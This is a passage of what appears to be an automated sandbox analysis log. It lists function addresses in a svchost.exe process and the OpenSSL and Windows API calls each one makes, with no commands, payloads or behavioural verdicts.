Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,53_2_00007FFDA333E220
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3388B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free,53_2_00007FFDA3388B90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3386A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA3386A60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3332F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,53_2_00007FFDA3332F50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3388CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,53_2_00007FFDA3388CA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332D360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA332D360
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3337360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,53_2_00007FFDA3337360
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333D68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free,53_2_00007FFDA333D68B
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3389730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA3389730
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333DAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA333DAA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33223C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33223C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3344380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,53_2_00007FFDA3344380
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A8426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,53_2_00007FFDA33A8426
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33A844C
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3340450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,53_2_00007FFDA3340450
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33623F0 CRYPTO_free,53_2_00007FFDA33623F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3358400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf,53_2_00007FFDA3358400
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A8414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,53_2_00007FFDA33A8414
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33302B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,53_2_00007FFDA33302B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33262C0 CRYPTO_clear_free,53_2_00007FFDA33262C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,53_2_00007FFDA336A2C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334C2C0 CRYPTO_free,53_2_00007FFDA334C2C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A02C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33A02C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3344260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,53_2_00007FFDA3344260
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333A330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,53_2_00007FFDA333A330
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free,53_2_00007FFDA335A330
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3354330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,53_2_00007FFDA3354330
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3390340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,53_2_00007FFDA3390340
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A82E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33A82E7
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338A2E0 RAND_bytes_ex,CRYPTO_malloc,memset,53_2_00007FFDA338A2E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33822F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33822F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33741B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert,53_2_00007FFDA33741B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337A1D0 CRYPTO_realloc,53_2_00007FFDA337A1D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3344160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,53_2_00007FFDA3344160
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3378160 CRYPTO_memdup,53_2_00007FFDA3378160
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3336190 CRYPTO_malloc,CRYPTO_free,53_2_00007FFDA3336190
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A6190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,53_2_00007FFDA33A6190
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,53_2_00007FFDA338C190
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33381E0 CRYPTO_get_ex_data,53_2_00007FFDA33381E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33621E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl,53_2_00007FFDA33621E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336C0D0 CRYPTO_free,53_2_00007FFDA336C0D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3344060 CRYPTO_free,CRYPTO_memdup,53_2_00007FFDA3344060
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3390070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,53_2_00007FFDA3390070
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3344120 CRYPTO_set_ex_data,53_2_00007FFDA3344120
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3368120 CRYPTO_free,53_2_00007FFDA3368120
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3330130 CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA3330130
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3370130 CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA3370130
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3348140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3348140
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33340E0 CRYPTO_get_ex_data,53_2_00007FFDA33340E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33540E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,53_2_00007FFDA33540E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33827B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA33827B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33767D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts,53_2_00007FFDA33767D1
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33707D0 CRYPTO_malloc,memcpy,CRYPTO_free,53_2_00007FFDA33707D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,53_2_00007FFDA336A7D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3370770 CRYPTO_clear_free,CRYPTO_free,53_2_00007FFDA3370770
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337E790 CRYPTO_free,53_2_00007FFDA337E790
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3344840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,53_2_00007FFDA3344840
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337A850 CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA337A850
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3378850 CRYPTO_realloc,53_2_00007FFDA3378850
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,53_2_00007FFDA339C7E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33227F0 DeleteCriticalSection,CRYPTO_free,53_2_00007FFDA33227F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3374800 OPENSSL_LH_delete,CRYPTO_free,53_2_00007FFDA3374800
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336E810 CRYPTO_zalloc,53_2_00007FFDA336E810
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3328812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,53_2_00007FFDA3328812
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337E6D0 CRYPTO_malloc,53_2_00007FFDA337E6D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3344660 CRYPTO_free,CRYPTO_malloc,memcpy,53_2_00007FFDA3344660
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA336E660
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3328720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3328720
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337E730 CRYPTO_free,53_2_00007FFDA337E730
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3372740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free,53_2_00007FFDA3372740
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332E700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA332E700
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336C700 CRYPTO_malloc,memcmp,memcpy,memcpy,53_2_00007FFDA336C700
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33325A0 CRYPTO_strdup,CRYPTO_free,53_2_00007FFDA33325A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33545A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,53_2_00007FFDA33545A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33AC5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33AC5A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33725B0 OPENSSL_cleanse,CRYPTO_free,53_2_00007FFDA33725B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free,53_2_00007FFDA336A5C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3348580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3348580
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3372630 OPENSSL_cleanse,CRYPTO_free,53_2_00007FFDA3372630
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3392630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3392630
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333C610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA333C610
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33324D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,53_2_00007FFDA33324D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3322460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free,53_2_00007FFDA3322460
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A4460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,53_2_00007FFDA33A4460
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3362470 CRYPTO_zalloc,53_2_00007FFDA3362470
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3344490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,53_2_00007FFDA3344490
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A2500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,53_2_00007FFDA33A2500
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free,53_2_00007FFDA335E510
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3372BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert,53_2_00007FFDA3372BA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3356BB0 CRYPTO_malloc,53_2_00007FFDA3356BB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332CB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,53_2_00007FFDA332CB70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332AB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,53_2_00007FFDA332AB80
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336AB80 CRYPTO_free,53_2_00007FFDA336AB80
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334CB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,53_2_00007FFDA334CB80
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3398B90 CRYPTO_free,CRYPTO_memdup,53_2_00007FFDA3398B90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,53_2_00007FFDA336AC50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333ABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,53_2_00007FFDA333ABF0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332CAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,53_2_00007FFDA332CAB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333AAD0 CRYPTO_set_ex_data,53_2_00007FFDA333AAD0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A0AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33A0AD0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3354A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,53_2_00007FFDA3354A60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337AA70 CRYPTO_realloc,53_2_00007FFDA337AA70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3334A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3334A72
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3322A80 CRYPTO_free,CRYPTO_free,53_2_00007FFDA3322A80
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3336A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,53_2_00007FFDA3336A90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337EB20 CRYPTO_free,53_2_00007FFDA337EB20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3390B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,53_2_00007FFDA3390B20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3356B30 CRYPTO_free,CRYPTO_free,53_2_00007FFDA3356B30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A0B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA33A0B30
